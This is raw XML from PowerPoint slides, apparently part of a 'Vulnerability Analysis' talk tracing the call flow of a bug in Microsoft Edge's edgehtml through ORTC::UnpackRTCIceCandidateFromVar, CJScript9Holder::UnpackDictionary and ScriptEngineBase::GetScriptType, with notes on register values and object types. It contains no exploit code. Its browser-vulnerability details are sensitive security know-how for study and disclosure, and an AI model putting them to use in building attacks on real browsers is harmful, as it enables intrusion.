              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="图片 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2EA76AF-DF2E-4274-9483-07B9B6DA7B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7668600" y="3438450"/>
            <a:ext cx="4351310" cy="4908431"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="矩形 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E6E2695-C786-4D1B-A090-2E556B3759C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="2665674"/>
            <a:ext cx="5170488" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UnpackRTCIceCandidateFromVar</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED005CF-5C71-47DC-BBAB-95EDC4DA7235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2903987" y="7914327"/>
            <a:ext cx="4792214" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="zh-CN"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ScriptEngineBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9743CA3-2B16-49E5-A779-B5D8384B3971}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2650509" y="9002993"/>
            <a:ext cx="5134558" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UnpackDictionary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AB397F8-B2B4-4CA0-A114-55C9AA57BE8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1604761" y="4793127"/>
            <a:ext cx="2059189"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4" name="连接符: 肘形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F248B01-EBEA-403C-854C-C82A69425451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="20" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1074773" y="4869179"/>
            <a:ext cx="529988" cy="282543"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 14313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6" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB29C4EF-7BC8-4BF8-AD78-A0D49612817D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1230155" y="7390664"/>
            <a:ext cx="3440905" cy="13727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27" name="连接符: 肘形 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{012F0AB1-C3CB-40C8-9C0F-B2FA498DB5F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="26" idx="3"/>
            <a:endCxn id="22" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4671060" y="2881951"/>
            <a:ext cx="2758440" cy="4577351"/>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矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97DE282D-9C53-41CB-9CE8-113EF989279F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7785066" y="4354474"/>
            <a:ext cx="3237369"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2" name="连接符: 肘形 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{203D45B5-0AE5-48C4-865C-91E37C34CD36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="30" idx="2"/>
            <a:endCxn id="23" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5643157" y="4153732"/>
            <a:ext cx="3417533" cy="4103657"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 9264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5" name="矩形 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31A48470-8A8E-4D52-90C1-DD0C441A3351}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7935301" y="7905796"/>
            <a:ext cx="4103657"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7" name="连接符: 肘形 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8803E2E-4575-4A66-8EE2-AA201ECDE76B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="35" idx="2"/>
            <a:endCxn id="24" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8300522" y="7532662"/>
            <a:ext cx="1171154" cy="2202063"/>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51698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16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D48AEB4-C927-4837-9E9A-19DD534D2A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="4734053" cy="432554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackRTCIceCandidateFromVar</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="图片 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27FC98BB-0B11-4398-804D-30286B9F2A06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089648" y="3684196"/>
            <a:ext cx="8330123" cy="1567897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="图片 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F52FBC8-F70F-490A-936C-631C8AA9FF6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="5461189"/>
            <a:ext cx="8341646" cy="2788924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本框 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0DF7E0-A451-4266-820D-5DA6873CF70C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419771" y="3642230"/>
            <a:ext cx="2611809" cy="1793440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> points to the function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ScriptEngineBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="矩形 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D8DD5F2-F6A9-455E-BB0B-AECF8CCB05D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279867" y="3707970"/>
            <a:ext cx="2209834"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 name="连接符: 肘形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0C10DD-C1A6-49E0-9D34-59814D142DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="36" idx="0"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="8022360" y="1004654"/>
            <a:ext cx="65740" cy="5340892"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 44773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8" name="矩形 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B0FFA3B-9762-49D7-824C-94CC1EC4A2DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279867" y="4408919"/>
            <a:ext cx="2209834"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DD0F4779-A5D5-4C57-8F10-C8ECC1B7D644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4279867" y="5071815"/>
            <a:ext cx="2209834"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40" name="矩形 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CFB99BB-53A6-4FAC-8215-8EE8ED5C7309}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289392" y="4576515"/>
            <a:ext cx="2644808" cy="1423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42" name="图片 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{856AA9A3-EF40-4922-95F1-4B8C7CB2FE33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089648" y="8351499"/>
            <a:ext cx="3564239" cy="883312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="连接符: 肘形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3A7E2BC-9731-441A-B761-908A145835D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="40" idx="1"/>
            <a:endCxn id="42" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1089648" y="4647675"/>
            <a:ext cx="3199744" cy="4145480"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 110716"/>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3" name="文本框 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2354FF9A-413D-4B82-AE4A-06C0C113AF09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9498564" y="6386477"/>
            <a:ext cx="2213122" cy="772776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Object type is not supported</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="连接符: 肘形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B949A8E3-9F07-4339-950D-C35AC761228B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="39" idx="3"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6489701" y="5142975"/>
            <a:ext cx="4115424" cy="1243502"/>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46" name="连接符: 肘形 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3C15B35-ED4B-4E4E-A031-0AE6C29C7B04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="38" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6489701" y="4480079"/>
            <a:ext cx="2768599" cy="662896"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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7" name="文本框 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{008C026B-292A-40BB-8A06-2266F8DF5008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4665410" y="8317584"/>
            <a:ext cx="7046276" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>The function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ScriptEngineBase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GetScriptType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> will be based on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Different objects will give the location different values</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23449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Vulnerability Analysis</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0BD9C998-89FA-4C23-8F8D-64894199F9A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078124" y="3121578"/>
            <a:ext cx="10953455" cy="5575052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JScript9Holder's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackDictionary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> call flow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.edgehtml!CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackDictionary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
